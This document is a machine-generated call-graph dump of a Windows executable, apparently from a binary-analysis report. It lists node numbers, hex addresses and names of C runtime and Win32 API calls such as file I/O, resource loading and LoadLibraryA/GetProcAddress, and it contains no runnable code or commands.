101809->101810 101811 6b965b 101810->101811 101812 67571c __malloc_crt 58 API calls 101811->101812 101813 6b9665 101812->101813 101814 654f0b 74 API calls 101813->101814 101815 6b9679 101814->101815 101816 6b9109 GetSystemTimeAsFileTime 101815->101816 101817 6b968c 101816->101817 101818 6b96a1 101817->101818 101819 6b96b6 101817->101819 101820 672d55 _free 58 API calls 101818->101820 101821 6b971b 101819->101821 101822 6b96bc 101819->101822 101824 6b96a7 101820->101824 101823 672d55 _free 58 API calls 101821->101823 102346 6b8b06 101822->102346 101828 68d186 101823->101828 101826 672d55 _free 58 API calls 101824->101826 101826->101828 101828->101477 101830 654e4a 101828->101830 101829 672d55 _free 58 API calls 101829->101828 101831 654e54 101830->101831 101833 654e5b 101830->101833 101832 6753a6 __fcloseall 83 API calls 101831->101832 101832->101833 101834 654e7b FreeLibrary 101833->101834 101835 654e6a 101833->101835 101834->101835 101835->101477 101845 657e4f 101836->101845 101838 6579fd 101838->101714 101840 653f82 101839->101840 101844 653fa4 _memmove 101839->101844 101842 670db6 Mailbox 59 API calls 101840->101842 101841 670db6 Mailbox 59 API calls 101843 653fb8 101841->101843 101842->101844 101843->101723 101844->101841 101846 657e62 101845->101846 101848 657e5f _memmove 101845->101848 101847 670db6 Mailbox 59 API calls 101846->101847 101847->101848 101848->101838 101898 654c03 101849->101898 101852 654c03 2 API calls 101855 654bdc 101852->101855 101853 654bf5 101856 67525b 101853->101856 101854 654bec FreeLibrary 101854->101853 101855->101853 101855->101854 101902 675270 101856->101902 101858 654dfc 101858->101729 101858->101730 102060 654c36 101859->102060 101862 654b8f 101864 654ba1 FreeLibrary 101862->101864 101865 654baa 101862->101865 101863 654c36 2 API calls 101863->101862 101864->101865 101866 654c70 101865->101866 101867 670db6 Mailbox 59 API calls 101866->101867 101868 654c85 101867->101868 102064 65522e 101868->102064 101870 654c91 _memmove 101871 654ccc 101870->101871 101872 654dc1 101870->101872 101873 654d89 101870->101873 101874 654ec7 69 API calls 101871->101874 102078 6b991b 95 API calls 101872->102078 102067 654e89 CreateStreamOnHGlobal 101873->102067 101878 654cd5 101874->101878 101877 654f0b 74 API calls 101877->101878 101878->101877 101879 654d69 101878->101879 101881 68d8a7 101878->101881 102073 654ee5 101878->102073 101879->101738 101882 654ee5 85 API calls 101881->101882 101883 68d8bb 101882->101883 101884 654f0b 74 API calls 101883->101884 101884->101879 101886 654f1d 101885->101886 101889 68d9cd 101885->101889 102102 6755e2 101886->102102 101890 6b9109 102300 6b8f5f 101890->102300 101892 6b911f 101892->101745 101894 654ed6 101893->101894 101895 68d990 101893->101895 102305 675c60 101894->102305 101897 654ede 101897->101747 101899 654bd0 101898->101899 101900 654c0c LoadLibraryA 101898->101900 101899->101852 101899->101855 101900->101899 101901 654c1d GetProcAddress 101900->101901 101901->101899 101904 67527c _wprintf 101902->101904 101903 67528f 101951 678b28 58 API calls __getptd_noexit 101903->101951 101904->101903 101906 6752c0 101904->101906 101921 6804e8 101906->101921 101907 675294 101952 678db6 9 API calls _wprintf 101907->101952 101910 6752c5 101911 6752ce 101910->101911 101912 6752db 101910->101912 101953 678b28 58 API calls __getptd_noexit 101911->101953 101914 675305 101912->101914 101915 6752e5 101912->101915 101936 680607 101914->101936 101954 678b28 58 API calls __getptd_noexit 101915->101954 101917 67529f _wprintf @_EH4_CallFilterFunc@8 101917->101858 101922 6804f4 _wprintf 101921->101922 101923 679c0b __lock 58 API calls 101922->101923 101934 680502 101923->101934 101924 680576 101956 6805fe 101924->101956 101925 68057d 101961 67881d 58 API calls __malloc_crt 101925->101961 101928 680584 101928->101924 101962 679e2b InitializeCriticalSectionAndSpinCount 101928->101962 101929 6805f3 _wprintf 101929->101910 101931 679c93 __mtinitlocknum 58 API calls 101931->101934 101933 6805aa EnterCriticalSection 101933->101924 101934->101924 101934->101925 101934->101931 101959 676c50 59 API calls __lock 101934->101959 101960 676cba LeaveCriticalSection LeaveCriticalSection _doexit 101934->101960 101945 680627 __wopenfile 101936->101945 101937 680641 101967 678b28 58 API calls __getptd_noexit 101937->101967 101939 6807fc 101939->101937 101943 68085f 101939->101943 101940 680646 101968 678db6 9 API calls _wprintf 101940->101968 101942 675310 101955 675332 LeaveCriticalSection LeaveCriticalSection _fseek 101942->101955 101964 6885a1 101943->101964 101945->101937 101945->101939 101945->101945 101969 6737cb 60 API calls 2 library calls 101945->101969 101947 6807f5 101947->101939 101970 6737cb 60 API calls 2 library calls 101947->101970 101949 680814 101949->101939 101971 6737cb 60 API calls 2 library calls 101949->101971 101951->101907 101952->101917 101953->101917 101954->101917 101955->101917 101963 679d75 LeaveCriticalSection 101956->101963 101958 680605 101958->101929 101959->101934 101960->101934 101961->101928 101962->101933 101963->101958 101972 687d85 101964->101972 101966 6885ba 101966->101942 101967->101940 101968->101942 101969->101947 101970->101949 101971->101939 101973 687d91 _wprintf 101972->101973 101974 687da7 101973->101974 101977 687ddd 101973->101977 102057 678b28 58 API calls __getptd_noexit 101974->102057 101976 687dac 102058 678db6 9 API calls _wprintf 101976->102058 101983 687e4e 101977->101983 101980 687df9 102059 687e22 LeaveCriticalSection __unlock_fhandle 101980->102059 101982 687db6 _wprintf 101982->101966 101984 687e6e 101983->101984 101985 6744ea __wsopen_nolock 58 API calls 101984->101985 101989 687e8a 101985->101989 101986 678dc6 __invoke_watson 8 API calls 101987 6885a0 101986->101987 101991 687d85 __wsopen_helper 103 API calls 101987->101991 101988 687ee7 101997 687fa5 101988->101997 102005 687f83 101988->102005 101989->101988 101990 687ec4 101989->101990 102006 687fc1 101989->102006 101992 678af4 __dosmaperr 58 API calls 101990->101992 101993 6885ba 101991->101993 101994 687ec9 101992->101994 101993->101980 101995 678b28 _wprintf 58 API calls 101994->101995 101996 687ed6 101995->101996 101998 678db6 _wprintf 9 API calls 101996->101998 101999 678af4 __dosmaperr 58 API calls 101997->101999 102000 687ee0 101998->102000 102001 687faa 101999->102001 102000->101980 102002 678b28 _wprintf 58 API calls 102001->102002 102003 687fb7 102002->102003 102004 678db6 _wprintf 9 API calls 102003->102004 102004->102006 102007 67d294 __alloc_osfhnd 61 API calls 102005->102007 102006->101986 102008 688051 102007->102008 102009 68805b 102008->102009 102010 68807e 102008->102010 102011 678af4 __dosmaperr 58 API calls 102009->102011 102012 687cfd ___createFile GetModuleHandleW GetProcAddress CreateFileW 102010->102012 102013 688060 102011->102013 102023 6880a0 102012->102023 102014 678b28 _wprintf 58 API calls 102013->102014 102016 68806a 102014->102016 102015 68811e GetFileType 102017 688129 GetLastError 102015->102017 102018 68816b 102015->102018 102021 678b28 _wprintf 58 API calls 102016->102021 102022 678b07 __dosmaperr 58 API calls 102017->102022 102027 67d52a __set_osfhnd 59 API calls 102018->102027 102019 6880ec GetLastError 102020 678b07 __dosmaperr 58 API calls 102019->102020 102024 688111 102020->102024 102021->102000 102025 688150 CloseHandle 102022->102025 102023->102015 102023->102019 102026 687cfd ___createFile GetModuleHandleW GetProcAddress CreateFileW 102023->102026 102030 678b28 _wprintf 58 API calls 102024->102030 102025->102024 102028 68815e 102025->102028 102029 6880e1 102026->102029 102034 688189 102027->102034 102031 678b28 _wprintf 58 API calls 102028->102031 102029->102015 102029->102019 102030->102006 102032 688163 102031->102032 102032->102024 102033 688344 102033->102006 102036 688517 CloseHandle 102033->102036 102034->102033 102035 6818c1 __lseeki64_nolock 60 API calls 102034->102035 102051 68820a 102034->102051 102037 6881f3 102035->102037 102038 687cfd ___createFile GetModuleHandleW GetProcAddress CreateFileW 102036->102038 102041 678af4 __dosmaperr 58 API calls 102037->102041 102037->102051 102040 68853e 102038->102040 102039 680e5b 70 API calls __read_nolock 102039->102051 102042 688572 102040->102042 102043 688546 GetLastError 102040->102043 102041->102051 102042->102006 102044 678b07 __dosmaperr 58 API calls 102043->102044 102046 688552 102044->102046 102045 68823c 102048 6897a2 __chsize_nolock 82 API calls 102045->102048 102045->102051 102049 67d43d __free_osfhnd 59 API calls 102046->102049 102047 680add __close_nolock 61 API calls 102047->102051 102048->102045 102049->102042 102050 67d886 __write 78 API calls 102050->102051 102051->102033 102051->102039 102051->102045 102051->102047 102051->102050 102052 6883c1 102051->102052 102055 6818c1 60 API calls __lseeki64_nolock 102051->102055 102053 680add __close_nolock 61 API calls 102052->102053 102054 6883c8 102053->102054 102056 678b28 _wprintf 58 API calls 102054->102056 102055->102051 102056->102006 102057->101976 102058->101982 102059->101982 102061 654b83 102060->102061 102062 654c3f LoadLibraryA 102060->102062 102061->101862 102061->101863 102062->102061 102063 654c50 GetProcAddress 102062->102063 102063->102061 102065 670db6 Mailbox 59 API calls 102064->102065 102066 655240 102065->102066 102066->101870 102068 654ea3 FindResourceExW 102067->102068 102072 654ec0 102067->102072 102069 68d933 LoadResource 102068->102069 102068->102072 102070 68d948 SizeofResource 102069->102070 102069->102072 102071 68d95c LockResource 102070->102071 102070->102072 102071->102072 102072->101871 102074 654ef4 102073->102074 102075 68d9ab 102073->102075 102079 67584d 102074->102079 102077 654f02 102077->101878 102078->101871 102080 675859 _wprintf 102079->102080 102081 67586b 102080->102081 102083 675891 102080->102083 102092 678b28 58 API calls __getptd_noexit 102081->102092 102094 676c11 102083->102094 102084 675870 102093 678db6 9 API calls _wprintf 102084->102093 102087 675897 102100 6757be 83 API calls 5 library calls 102087->102100 102089 6758a6 102101 6758c8 LeaveCriticalSection LeaveCriticalSection _fseek 102089->102101 102091 67587b _wprintf 102091->102077 102092->102084 102093->102091 102095 676c43 EnterCriticalSection 102094->102095 102096 676c21 102094->102096 102098 676c39 102095->102098 102096->102095 102097 676c29 102096->102097 102099 679c0b __lock 58 API calls 102097->102099 102098->102087 102099->102098 102100->102089 102101->102091 102105 6755fd 102102->102105 102104 654f2e 102104->101890 102106 675609 _wprintf 102105->102106 102107 67564c 102106->102107 102108 675644 _wprintf 102106->102108 102110 67561f _memset 102106->102110 102109 676c11 __lock_file 59 API calls 102107->102109 102108->102104 102112 675652 102109->102112 102132 678b28 58 API calls __getptd_noexit 102110->102132 102118 67541d 102112->102118 102113 675639 102133 678db6 9 API calls _wprintf 102113->102133 102119 675453 102118->102119 102122 675438 _memset 102118->102122 102134 675686 LeaveCriticalSection LeaveCriticalSection _fseek 102119->102134 102120 675443 102230 678b28 58 API calls __getptd_noexit 102120->102230 102122->102119 102122->102120 102124 675493 102122->102124 102124->102119 102126 6755a4 _memset 102124->102126 102135 6746e6 102124->102135 102142 680e5b 102124->102142 102210 680ba7 102124->102210 102232 680cc8 58 API calls 3 library calls 102124->102232 102233 678b28 58 API calls __getptd_noexit 102126->102233 102131 675448 102231 678db6 9 API calls _wprintf 102131->102231 102132->102113 102133->102108 102134->102108 102136 674705 102135->102136 102137 6746f0 102135->102137 102136->102124 102234 678b28 58 API calls __getptd_noexit 102137->102234 102139 6746f5 102235 678db6 9 API calls _wprintf 102139->102235 102141 674700 102141->102124 102143 680e7c 102142->102143 102144 680e93 102142->102144 102245 678af4 58 API calls __getptd_noexit 102143->102245 102145 6815cb 102144->102145 102150 680ecd 102144->102150 102261 678af4 58 API calls __getptd_noexit 102145->102261 102148 680e81 102246 678b28 58 API calls __getptd_noexit 102148->102246 102152 680ed5 102150->102152 102159 680eec 102150->102159 102151 6815d0 102262 678b28 58 API calls __getptd_noexit 102151->102262 102247 678af4 58 API calls __getptd_noexit 102152->102247 102155 680ee1 102263 678db6 9 API calls _wprintf 102155->102263 102156 680e88 102156->102124 102157 680eda 102248 678b28 58 API calls __getptd_noexit 102157->102248 102159->102156 102160 680f01 102159->102160 102162 680f1b 102159->102162 102165 680f39 102159->102165 102249 678af4 58 API calls __getptd_noexit 102160->102249 102162->102160 102164 680f26 102162->102164 102236 685c6b 102164->102236 102250 67881d 58 API calls __malloc_crt 102165->102250 102168 680f49 102170 680f6c 102168->102170 102171 680f51 102168->102171 102169 68103a 102172 6810b3 ReadFile 102169->102172 102175 681050 GetConsoleMode 102169->102175 102253 6818c1 60 API calls 3 library calls 102170->102253 102251 678b28 58 API calls __getptd_noexit 102171->102251 102176 681593 GetLastError 102172->102176 102177 6810d5 102172->102177 102181 6810b0 102175->102181 102182 681064 102175->102182 102179 6815a0 102176->102179 102186 681093 102176->102186 102177->102176 102184 6810a5 102177->102184 102178 680f56 102252 678af4 58 API calls __getptd_noexit 102178->102252 102259 678b28 58 API calls __getptd_noexit 102179->102259 102181->102172 102182->102181 102185 68106a ReadConsoleW 102182->102185 102192 681099 102184->102192 102194 68110a 102184->102194 102197 681377 102184->102197 102185->102184 102188 68108d GetLastError 102185->102188 102186->102192 102254 678b07 58 API calls 2 library calls 102186->102254 102187 6815a5 102260 678af4 58 API calls __getptd_noexit 102187->102260 102188->102186 102191 672d55 _free 58 API calls 102191->102156 102192->102156 102192->102191 102195 681176 ReadFile 102194->102195 102203 6811f7 102194->102203 102198 681197 GetLastError 102195->102198 102208 6811a1 102195->102208 102196 68147d ReadFile 102202 6814a0 GetLastError 102196->102202 102209 6814ae 102196->102209 102197->102192 102197->102196 102198->102208 102199 6812b4 102204 681264 MultiByteToWideChar 102199->102204 102257 6818c1 60 API calls 3 library calls 102199->102257 102200 6812a4 102256 678b28 58 API calls __getptd_noexit 102200->102256 102202->102209 102203->102192 102203->102199 102203->102200 102203->102204 102204->102188 102204->102192 102208->102194 102255 6818c1 60 API calls 3 library calls 102208->102255 102209->102197 102258 6818c1 60 API calls 3 library calls 102209->102258 102211 680bb2 102210->102211 102215 680bc7 102210->102215 102297 678b28 58 API calls __getptd_noexit 102211->102297 102213 680bb7 102298 678db6 9 API calls _wprintf 102213->102298 102216 680bfc 102215->102216 102223 680bc2 102215->102223 102299 685fe4 58 API calls __malloc_crt 102215->102299 102218 6746e6 __fclose_nolock 58 API calls 102216->102218 102219 680c10 102218->102219 102264 680d47 102219->102264 102221 680c17 102222 6746e6 __fclose_nolock 58 API calls 102221->102222 102221->102223 102224 680c3a 102222->102224 102223->102124 102224->102223 102225 6746e6 __fclose_nolock 58 API calls 102224->102225 102226 680c46 102225->102226 102226->102223 102227 6746e6 __fclose_nolock 58 API calls 102226->102227 102228 680c53 102227->102228 102229 6746e6 __fclose_nolock 58 API calls 102228->102229 102229->102223 102230->102131 102231->102119 102232->102124 102233->102131 102234->102139 102235->102141 102237 685c76 102236->102237 102239 685c83 102236->102239 102238 678b28 _wprintf 58 API calls 102237->102238 102240 685c7b 102238->102240 102241 685c8f 102239->102241 102242 678b28 _wprintf 58 API calls 102239->102242 102240->102169 102241->102169 102243 685cb0 102242->102243 102244 678db6 _wprintf 9 API calls 102243->102244 102244->102240 102245->102148 102246->102156 102247->102157 102248->102155 102249->102157 102250->102168 102251->102178 102252->102156 102253->102164 102254->102192 102255->102208 102256->102192 102257->102204 102258->102209 102259->102187 102260->102192 102261->102151 102262->102155 102263->102156 102265 680d53 _wprintf 102264->102265 102266 680d60 102265->102266 102267 680d77 102265->102267 102269 678af4 __dosmaperr 58 API calls 102266->102269 102268 680e3b 102267->102268 102270 680d8b 102267->102270 102271 678af4 __dosmaperr 58 API calls 102268->102271 102272 680d65 102269->102272 102273 680da9 102270->102273 102274 680db6 102270->102274 102279 680dae 102271->102279 102275 678b28 _wprintf 58 API calls 102272->102275 102276 678af4 __dosmaperr 58 API calls 102273->102276 102277 680dd8 102274->102277 102278 680dc3 102274->102278 102286 680d6c _wprintf 102275->102286 102276->102279 102281 67d206 ___lock_fhandle 59 API calls 102277->102281 102280 678af4 __dosmaperr 58 API calls 102278->102280 102282 678b28 _wprintf 58 API calls 102279->102282 102283 680dc8 102280->102283 102284 680dde 102281->102284 102285 680dd0 102282->102285 102287 678b28 _wprintf 58 API calls 102283->102287 102288 680df1 102284->102288 102289 680e04 102284->102289 102291 678db6 _wprintf 9 API calls 102285->102291 102286->102221 102287->102285 102290 680e5b __read_nolock 70 API calls 102288->102290 102292 678b28 _wprintf 58 API calls 102289->102292 102293 680dfd 102290->102293 102291->102286 102294 680e09 102292->102294 102296 680e33 __read LeaveCriticalSection 102293->102296 102295 678af4 __dosmaperr 58 API calls 102294->102295 102295->102293 102296->102286 102297->102213 102298->102223 102299->102216 102303 67520a GetSystemTimeAsFileTime 102300->102303 102302 6b8f6e 102302->101892 102304 675238 __aulldiv 102303->102304 102304->102302 102306 675c6c _wprintf 102305->102306 102307 675c93 102306->102307 102308 675c7e 102306->102308 102310 676c11 __lock_file 59 API calls 102307->102310 102319 678b28 58 API calls __getptd_noexit 102308->102319 102312 675c99 102310->102312 102311 675c83 102320 678db6 9 API calls _wprintf 102311->102320 102321 6758d0 67 API calls 6 library calls 102312->102321 102315 675ca4 102322 675cc4 LeaveCriticalSection LeaveCriticalSection _fseek 102315->102322 102317 675cb6 102318 675c8e _wprintf 102317->102318 102318->101897 102319->102311 102320->102318 102321->102315 102322->102317 102323->101750 102324->101758 102325->101771 102326->101773 102327->101770 102328->101779 102330 659169 Mailbox 102329->102330 102331 68f19f 102330->102331 102336 659173 102330->102336 102332 670db6 Mailbox 59 API calls 102331->102332 102334 68f1ab 102332->102334 102333 65917a 102333->101783 102336->102333 102337 659c90 59 API calls Mailbox 102336->102337 102337->102336 102338->101794 102339->101789 102345 6b9748 __tzset_nolock _wcscmp 102340->102345 102341 654f0b 74 API calls 102341->102345 102342 6b95dc 102342->101800 102342->101828 102343 6b9109 GetSystemTimeAsFileTime 102343->102345 102344 654ee5 85 API calls 102344->102345 102345->102341 102345->102342 102345->102343 102345->102344 102347 6b8b11 102346->102347 102348 6b8b1f 102346->102348 102349 67525b 115 API calls 102347->102349 102350 6b8b64 102348->102350 102351 67525b 115 API calls 102348->102351 102362 6b8b28 102348->102362 102349->102348 102377 6b8d91 102350->102377 102353 6b8b49 102351->102353 102353->102350 102355 6b8b52 102353->102355 102354 6b8ba8 102356 6b8bcd 102354->102356 102357 6b8bac 102354->102357 102359 6753a6 __fcloseall 83 API calls 102355->102359 102355->102362 102381 6b89a9 102356->102381 102358 6b8bb9 102357->102358 102361 6753a6 __fcloseall 83 API calls 102357->102361 102358->102362 102364 6753a6 __fcloseall 83 API calls 102358->102364 102359->102362 102361->102358 102362->101829 102364->102362 102365 6b8bfb 102390 6b8c2b 102365->102390 102366 6b8bdb 102367 6b8be8 102366->102367 102369 6753a6 __fcloseall 83 API calls 102366->102369 102367->102362 102371 6753a6 __fcloseall 83 API calls 102367->102371 102369->102367 102371->102362 102374 6b8c16 102374->102362 102376 6753a6 __fcloseall 83 API calls 102374->102376 102376->102362 102378 6b8db6 102377->102378 102380 6b8d9f __tzset_nolock _memmove 102377->102380 102379 6755e2 __fread_nolock 74 API calls 102378->102379 102379->102380 102380->102354 102382 67571c __malloc_crt 58 API calls 102381->102382 102383 6b89b8 102382->102383 102384 67571c __malloc_crt 58 API calls 102383->102384 102385 6b89cc 102384->102385 102386 67571c __malloc_crt 58 API calls 102385->102386 102387 6b89e0 102386->102387 102388 6b8d0d 58 API calls 102387->102388 102389 6b89f3 102387->102389 102388->102389 102389->102365 102389->102366 102397 6b8c40 102390->102397 102391 6b8cf8 102419 6b8f35 102391->102419 102392 6b8a05 74 API calls 102392->102397 102394 6b8c02 102398 6b8d0d 102394->102398 102397->102391 102397->102392 102397->102394 102423 6b8aa1 74 API calls 102397->102423 102424 6b8e12 80 API calls 102397->102424 102399 6b8d1a 102398->102399 102400 6b8d20 102398->102400 102401 672d55 _free 58 API calls 102399->102401 102402 672d55 _free 58 API calls 102400->102402 102403 6b8d31 102400->102403 102401->102400 102402->102403 102404 6b8c09 102403->102404 102405 672d55 _free 58 API calls 102403->102405 102404->102374 102406 6753a6 102404->102406 102405->102404 102407 6753b2 _wprintf 102406->102407 102408 6753c6 102407->102408 102409 6753de 102407->102409 102506 678b28 58 API calls __getptd_noexit 102408->102506 102411 676c11 __lock_file 59 API calls 102409->102411 102415 6753d6 _wprintf 102409->102415 102413 6753f0 102411->102413 102412 6753cb 102507 678db6 9 API calls _wprintf 102412->102507 102490 67533a 102413->102490 102415->102374 102420 6b8f53 102419->102420 102421 6b8f42 102419->102421 102420->102394 102425 674863 102421->102425 102423->102397 102424->102397 102426 67486f _wprintf 102425->102426 102427 6748a5 102426->102427 102428 67488d 102426->102428 102429 67489d _wprintf 102426->102429 102430 676c11 __lock_file 59 API calls 102427->102430 102450 678b28 58 API calls __getptd_noexit 102428->102450 102429->102420 102433 6748ab 102430->102433 102432 674892 102451 678db6 9 API calls _wprintf 102432->102451 102438 67470a 102433->102438 102440 674719 102438->102440 102445 674737 102438->102445 102439 674727 102481 678b28 58 API calls __getptd_noexit 102439->102481 102440->102439 102440->102445 102448 674751 _memmove 102440->102448 102442 67472c 102482 678db6 9 API calls _wprintf 102442->102482 102452 6748dd LeaveCriticalSection LeaveCriticalSection _fseek 102445->102452 102447 6746e6 __fclose_nolock 58 API calls 102447->102448 102448->102445 102448->102447 102453 67d886 102448->102453 102483 674a3d 102448->102483 102489 67ae1e 78 API calls 6 library calls 102448->102489 102450->102432 102451->102429 102452->102429 102454 67d892 _wprintf 102453->102454 102455 67d8b6 102454->102455 102456 67d89f 102454->102456 102458 67d955 102455->102458 102461 67d8ca 102455->102461 102457 678af4 __dosmaperr 58 API calls 102456->102457 102460 67d8a4 102457->102460 102459 678af4 __dosmaperr 58 API calls 102458->102459 102462 67d8ed 102459->102462 102463 678b28 _wprintf 58 API calls 102460->102463 102464 67d8f2 102461->102464 102465 67d8e8 102461->102465 102468 678b28 _wprintf 58 API calls 102462->102468 102476 67d8ab _wprintf 102463->102476 102467 67d206 ___lock_fhandle 59 API calls 102464->102467 102466 678af4 __dosmaperr 58 API calls 102465->102466 102466->102462 102469 67d8f8 102467->102469 102470 67d961 102468->102470 102471 67d91e 102469->102471 102472 67d90b 102469->102472 102473 678db6 _wprintf 9 API calls 102470->102473 102475 678b28 _wprintf 58 API calls 102471->102475 102474 67d975 __write_nolock 76 API calls 102472->102474 102473->102476 102477 67d917 102474->102477 102478 67d923 102475->102478 102476->102448 102480 67d94d __write LeaveCriticalSection 102477->102480 102479 678af4 __dosmaperr 58 API calls 102478->102479 102479->102477 102480->102476 102481->102442 102482->102445 102484 674a50 102483->102484 102488 674a74 102483->102488 102485 6746e6 __fclose_nolock 58 API calls 102484->102485 102484->102488 102486 674a6d 102485->102486 102487 67d886 __write 78 API calls 102486->102487 102487->102488 102488->102448 102489->102448 102491 67535d 102490->102491 102492 675349 102490->102492 102495 674a3d __flush 78 API calls 102491->102495 102504 675359 102491->102504 102539 678b28 58 API calls __getptd_noexit 102492->102539 102494 67534e 102540 678db6 9 API calls _wprintf 102494->102540 102496 675369 102495->102496 102509 680b77 102496->102509 102500 6746e6 __fclose_nolock 58 API calls 102501 675377 102500->102501 102513 680a02 102501->102513 102503 67537d 102503->102504 102505 672d55 _free 58 API calls 102503->102505 102508 675415 LeaveCriticalSection LeaveCriticalSection _fseek 102504->102508 102505->102504 102506->102412 102507->102415 102508->102415 102510 675371 102509->102510 102511 680b84 102509->102511 102510->102500 102511->102510 102512 672d55 _free 58 API calls 102511->102512 102512->102510 102514 680a0e _wprintf 102513->102514 102515 680a1b 102514->102515 102516 680a32 102514->102516 102565 678af4 58 API calls __getptd_noexit 102515->102565 102518 680abd 102516->102518 102520 680a42 102516->102520 102570 678af4 58 API calls __getptd_noexit 102518->102570 102519 680a20 102566 678b28 58 API calls __getptd_noexit 102519->102566 102523 680a6a 102520->102523 102524 680a60 102520->102524 102541 67d206 102523->102541 102567 678af4 58 API calls __getptd_noexit 102524->102567 102527 680a65 102571 678b28 58 API calls __getptd_noexit 102527->102571 102529 680a70 102531 680a8e 102529->102531 102532 680a83 102529->102532 102530 680ac9 102572 678db6 9 API calls _wprintf 102530->102572 102568 678b28 58 API calls __getptd_noexit 102531->102568 102550 680add 102532->102550 102535 680a27 _wprintf 102535->102503 102537 680a89 102569 680ab5 LeaveCriticalSection __unlock_fhandle 102537->102569 102539->102494 102540->102504 102542 67d212 _wprintf 102541->102542 102543 67d261 EnterCriticalSection 102542->102543 102544 679c0b __lock 58 API calls 102542->102544 102545 67d287 _wprintf 102543->102545 102546 67d237 102544->102546 102545->102529 102549 67d24f 102546->102549 102573 679e2b InitializeCriticalSectionAndSpinCount 102546->102573 102574 67d28b LeaveCriticalSection _doexit 102549->102574 102575 67d4c3 102550->102575 102552 680b41 102588 67d43d 59 API calls 2 library calls 102552->102588 102554 680aeb 102554->102552 102555 680b1f 102554->102555 102557 67d4c3 __lseeki64_nolock 58 API calls 102554->102557 102555->102552 102558 67d4c3 __lseeki64_nolock 58 API calls 102555->102558 102556 680b49 102559 680b6b 102556->102559 102589 678b07 58 API calls 2 library calls 102556->102589 102560 680b16 102557->102560 102561 680b2b CloseHandle 102558->102561 102559->102537 102563 67d4c3 __lseeki64_nolock 58 API calls 102560->102563 102561->102552 102564 680b37 GetLastError 102561->102564 102563->102555 102564->102552 102565->102519 102566->102535 102567->102527 102568->102537 102569->102535 102570->102527 102571->102530 102572->102535 102573->102549 102574->102543 102576 67d4e3 102575->102576 102577 67d4ce 102575->102577 102580 678af4 __dosmaperr 58 API calls 102576->102580 102582 67d508 102576->102582 102578 678af4 __dosmaperr 58 API calls 102577->102578 102579 67d4d3 102578->102579 102581 678b28 _wprintf 58 API calls 102579->102581 102583 67d512 102580->102583 102585 67d4db 102581->102585 102582->102554 102584 678b28 _wprintf 58 API calls 102583->102584 102586 67d51a 102584->102586 102585->102554 102587 678db6 _wprintf 9 API calls 102586->102587 102587->102585 102588->102556 102589->102559 102652 681940 102590->102652 102593 65477c 102595 657bcc 59 API calls 102593->102595 102594 654799 102658 657d8c 102594->102658 102597 654788 102595->102597 102654 657726 102597->102654 102600 670791 102601 67079e __write_nolock 102600->102601 102602 67079f GetLongPathNameW 102601->102602 102603 657bcc 59 API calls 102602->102603 102604 6572bd 102603->102604 102605 65700b 102604->102605 102606 657667 59 API calls 102605->102606 102607 65701d 102606->102607 102608 654750 60 API calls 102607->102608 102609 657028 102608->102609 102610 657033 102609->102610 102611 68e885 102609->102611 102613 653f74 59 API calls 102610->102613 102616 68e89f 102611->102616 102672 657908 61 API calls 102611->102672 102614 65703f 102613->102614 102666 6534c2 102614->102666 102617 657052 Mailbox 102617->101556 102619 654ddd 136 API calls 102618->102619 102620 65688f 102619->102620 102621 68e031 102620->102621 102623 654ddd 136 API calls 102620->102623 102622 6b955b 122 API calls 102621->102622 102624 68e046 102622->102624 102625 6568a3 102623->102625 102626 68e04a 102624->102626 102627 68e067 102624->102627 102625->102621 102628 6568ab 102625->102628 102629 654e4a 84 API calls 102626->102629 102630 670db6 Mailbox 59 API calls 102627->102630 102631 6568b7 102628->102631 102632 68e052 102628->102632 102629->102632 102649 68e0ac Mailbox 102630->102649 102673 656a8c 102631->102673 102780 6b42f8 90 API calls _wprintf 102632->102780 102635 68e060 102635->102627 102637 68e260 102638 672d55 _free 58 API calls 102637->102638 102639 68e268 102638->102639 102640 654e4a 84 API calls 102639->102640 102645 68e271 102640->102645 102644 672d55 _free 58 API calls 102644->102645 102645->102644 102647 654e4a 84 API calls 102645->102647 102784 6af7a1 89 API calls 4 library calls 102645->102784 102647->102645 102648 657de1 59 API calls 102648->102649 102649->102637 102649->102645 102649->102648 102766 65750f 102649->102766 102774 65735d 102649->102774 102781 6af73d 59 API calls 2 library calls 102649->102781 102782 6af65e 61 API calls 2 library calls 102649->102782 102783 6b737f 59 API calls Mailbox 102649->102783 102653 65475d GetFullPathNameW 102652->102653 102653->102593 102653->102594 102655 657734 102654->102655 102662 657d2c 102655->102662 102657 654794 102657->102600 102659 657da6 102658->102659 102661 657d99 102658->102661 102660 670db6 Mailbox 59 API calls 102659->102660 102660->102661 102661->102597 102663 657d3a 102662->102663 102665 657d43 _memmove 102662->102665 102664 657e4f 59 API calls 102663->102664 102663->102665 102664->102665 102665->102657 102667 6534d4 102666->102667 102671 6534f3 _memmove 102666->102671 102669 670db6 Mailbox 59 API calls 102667->102669 102668 670db6 Mailbox 59 API calls 102670 65350a 102668->102670 102669->102671 102670->102617 102671->102668 102672->102611 102674 656ab5 102673->102674 102675 68e41e 102673->102675 102790 6557a6 102674->102790 102884 6af7a1 89 API calls 4 library calls 102675->102884 102678 68e431 102885 6af7a1 89 API calls 4 library calls 102678->102885 102683 656af4 102684 657667 59 API calls 102683->102684 102686 656b00 102684->102686 102685 68e44d 102717 656b61 102685->102717 102812 670957 60 API calls __write_nolock 102686->102812 102688 656b0c 102691 657667 59 API calls 102688->102691 102689 68e460 102692 655c6f CloseHandle 102689->102692 102690 656b6f 102693 657667 59 API calls 102690->102693 102694 656b18 102691->102694 102695 68e46c 102692->102695 102696 656b78 102693->102696 102697 654750 60 API calls 102694->102697 102698 654ddd 136 API calls 102695->102698 102699 657667 59 API calls 102696->102699 102701 656b26 102697->102701 102702 68e488 102698->102702 102700 656b81 102699->102700 102822 65459b 102700->102822 102813 655850 ReadFile SetFilePointerEx 102701->102813 102705 68e4b1 102702->102705 102709 6b955b 122 API calls 102702->102709 102886 6af7a1 89 API calls 4 library calls 102705->102886 102706 656b98 102711 657b2e 59 API calls 102706->102711 102708 656b52 102814 655aee 102708->102814 102710 68e4a4 102709->102710 102714 68e4ac 102710->102714 102715 68e4cd 102710->102715 102716 656ba9 SetCurrentDirectoryW 102711->102716 102712 68e4c8 102744 656d0c Mailbox 102712->102744 102718 654e4a 84 API calls 102714->102718 102719 654e4a 84 API calls 102715->102719 102722 656bbc Mailbox 102716->102722 102717->102689 102717->102690 102718->102705 102720 68e4d2 102719->102720 102721 670db6 Mailbox 59 API calls 102720->102721 102728 68e506 102721->102728 102724 670db6 Mailbox 59 API calls 102722->102724 102726 656bcf 102724->102726 102725 653bbb 102725->101423 102725->101446 102727 65522e 59 API calls 102726->102727 102755 656bda Mailbox __wsetenvp 102727->102755 102729 65750f 59 API calls 